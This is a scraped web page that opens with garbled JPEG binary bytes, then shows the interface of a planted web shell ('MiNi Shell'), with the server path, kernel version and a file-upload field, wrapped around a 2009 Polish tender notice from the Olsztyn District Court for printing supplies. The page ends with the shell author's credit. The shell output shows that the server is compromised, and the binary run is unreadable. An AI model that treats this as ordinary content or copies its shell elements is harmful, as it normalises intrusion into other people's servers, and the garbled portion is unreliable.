JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090313/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090313/62120-N-2009.html

<p class="kh_header"><b>Olsztyn: Zakup i sukcesywne dostarczanie druków dla Sądu Rejonowego w Olsztynie.</b><br>
<b>Numer ogłoszenia: 62120 - 2009; data zamieszczenia: 13.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Rejonowy , ul. Dąbrowszczaków 44, 10-001 Olsztyn, woj. warmińsko-mazurskie, tel. 089 523 02 30, faks 089 527 33 83.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.olsztyn.so.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i sukcesywne dostarczanie druków dla Sądu Rejonowego w Olsztynie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakup i sukcesywne dostarczanie druków dla Sądu Rejonowego w Olsztynie..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 22.80.00.00-8, 22.90.00.00-9, 30.19.97.11-7, 30.19.97.10-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1. Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2. Posiadają niezbędną wiedzę i doświadczenie do wykonania tzn.
Wykonali z należytą starannością w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, co najmniej jedną dostawę, odpowiadającą swoim rodzajem i wartością dostawę stanowiącą przedmiot zamówienia. 
Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, iż w wymaganym okresie wykonał minimum jedną dostawę druków, o całkowitej wartości, co najmniej równej kwocie 150 000 zł.
3. Dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia - Zamawiający nie wyznacza szczegółowego warunku w tym zakresie;
4. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - Zamawiający nie wyznacza szczegółowego warunku w tym zakresie;
5. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
6. Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w rozdziale VI SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnił. Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożą oświadczeń lub dokumentów potwierdzających spełnienie warunków udziału
w postępowaniu lub spełnienie przez oferowane dostawy, usługi lub roboty budowlane wymagań określonych przez Zamawiającego lub pełnomocnictw lub złożą dokumenty zawierające błędy lub wadliwe pełnomocnictwa, do ich uzupełnienia w wyznaczonym terminie chyba, że mimo ich uzupełnienia oferta Wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania. Złożone na wezwanie zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane dostawy, usługi lub roboty budowlane wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert.
Nie spełnienie chociażby jednego z w/w warunków, skutkować będzie wykluczeniem Wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Do oferty (wypełnionego formularza ofertowego) należy dołączyć następujące oświadczenia i dokumenty:
1) Wypełniony we wszystkich pozycjach formularz cenowy - wg wzoru zał. nr 1 do SIWZ.
2) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, przedstawiające aktualny stan faktyczny i prawny.
3) Oświadczenie o spełnianiu warunków udziału w postępowaniu - wg wzoru zał. nr 2 do SIWZ.
4) Oświadczenie, że Wykonawca nie podlega wykluczeniu z postępowania - wg wzoru zał. nr 3 do SIWZ.
5) Wykaz dostaw, wykonanych przez Wykonawcę w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wg wzoru zał. nr 4 do SIWZ.
6) Dokumenty potwierdzające, że w/w dostawy zostały należycie wykonane - (np. opinie, referencje, protokoły itp.).
7) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego.
8) W przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej - pełnomocnictwo (a).
2. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa powyżej składa dokumenty stosownie do § 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19.05.2006r.w sprawie rodzajów dokumentów jakich może żądać zamawiający od wykonawcy oraz form w jakich te dokumenty mogą być składane (DZ.U.06.87.605 oraz Dz.U.08.188.1155)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.olsztyn.so.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sąd Rejonowy w Olsztynie, ul. Dąbrowszczaków 44; 10-001 Olsztyn.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.03.2009 godzina 12:00, miejsce: Sąd Rejonowy w Olsztynie, ul. Dąbrowszczaków 44, 10 - 001 Olsztyn, Biuro Podawcze Sądu Rejonowego pok. Nr 51..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> druki, druki kolorowe, koperty z nadrukiem.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> DRUKI
A - 4 dwustronne ( bl.100 szt. )	Bl.	600
A - 4 jednostronne ( bl.100 szt. )	Bl.	700
A - 5 dwustronne ( bl.100 szt. )	Bl.	500
A - 5 jednostronne ( bl.100 szt. )	Bl.	600
A - 6 dwustronne ( bl.100 szt. )	Bl.	150
A - 6 jednostronne ( bl.100 szt. )	Bl.	200
A - 3 dwustronne ( bl.100 szt. )	Bl.	600
1/3 A- 4 dwustronne ( bl.100 szt. )	Bl.	200
2/3 A- 4 dwustronne x2 ( bl.100 szt. )	Bl.	100
1/3 A-4 jednostronne x2 ( bl. 100 szt.)	Bl.	10
Pocztowa książka nadawcza do placówki pocztowej  - samokopiująca 200 kart , miejsce do wpisania 15 pozycji na karcie Format A4	Szt.	450
Pocztowa książka nadawcza do placówki pocztowej  - samokopiująca 100 kart , miejsce do wpisania 10 pozycji na karcie Format 2/3 A4	Szt.	100
DRUKI KOLOROWE
A -3 dwustronny kolorowy ( bl. 100 szt.)	Bl.	475
A -4 dwustronny kolorowy ( bl. 100 szt.)	Bl.	465
A -4 jednostronny kolorowy( bl. 100 szt.)	Bl.	50
A -5 dwustronny kolorowy( bl. 100 szt.)	Bl.	350
A -5 jednostronny kolorowy( bl. 100 szt.)	Bl.	10
1/3 A- 4 dwustronne ( bl.100 szt. )	Bl.	18
KOPERTY Z NADRUKIEM
Koperta biała C6 samoprzylepna z okienkiem w prawym dolnym rogu, ze zwrotnym poświadczeniem odbioru  z nadrukiem karna i cywilna (karton po 1000 szt.) karton 10
Koperta  biała C6 samoprzylepna z nadrukiem karna i cywilna ( karton po 1000 szt.) karton 20.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.90.00.00-9, 30.19.97.10-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Księgi.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> księga format A - 3 / 200 kart /twarda oprawa/ karty numerowane	szt.	40
księga format A - 4/ 400 kart /twarda oprawa/ karty numerowane	szt.	30
księga format A - 4 / 200 kart /twarda oprawa/ karty numerowane	Szt.	100
księga format A - 4 / 150 kart /twarda oprawa/ karty numerowane	Szt.	15
księga format A - 4 / 100 kart /twarda oprawa/ karty numerowane	Szt.	23
A-4 /200 kart Skorowidz alfabetyczny /oprawa twarda/wycinane 	Szt.	10
A-4 /400 kart Skorowidz alfabetyczny /oprawa twarda/wycinane 	Szt.	2
księga format A5 /100kart/twarda oprawa/karty numerowane	Szt.	30.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.80.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> DRUKI NA KARTONIE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> A - 5- karton bez nadruku	Szt.	38000
A-4 bez nadruku -karton	Szt.	3000
A - 5 - karton jednostronny 	Szt.	4000
A - 5 karton dwustronny  	Szt.	100
A - 4 karton jednostronny	Szt.	25000
A - 4 - karton dwustronny 	Szt.	4000
A - 6 - karton jednostronny 	Szt.	3000
A-6 karton dwustronny (np. Zpo cywilne i karne) Szt. 4000
16 cm. x 15 cm. Karton jednostronny	Szt. 1000
Potwierdzenia odbioru karne i cywilne jednostronne do kopert D-L (bl. 100 szt.) -karton	Bl. 10000
Potwierdzenia odbioru karne i cywilne, dwustronne do kopert D-L  (bl. 100 szt.)-karton	Bl. 20
Okładka kartonowa cywilna, karna  350 g. Szt.	80000
Okładka kartonowa Wo 2xB4	Szt. 1500
Akta i dokumenty księgi wieczystej format 2 B 4 Teczka wiązana twarda Szt.	15000
Akta sprawy o wykroczenie format 2 B 4 + wpinka wklejana Szt. 15000
Teczka dozoru kuratorskiego 2xB4 Szt. 400.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.90.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com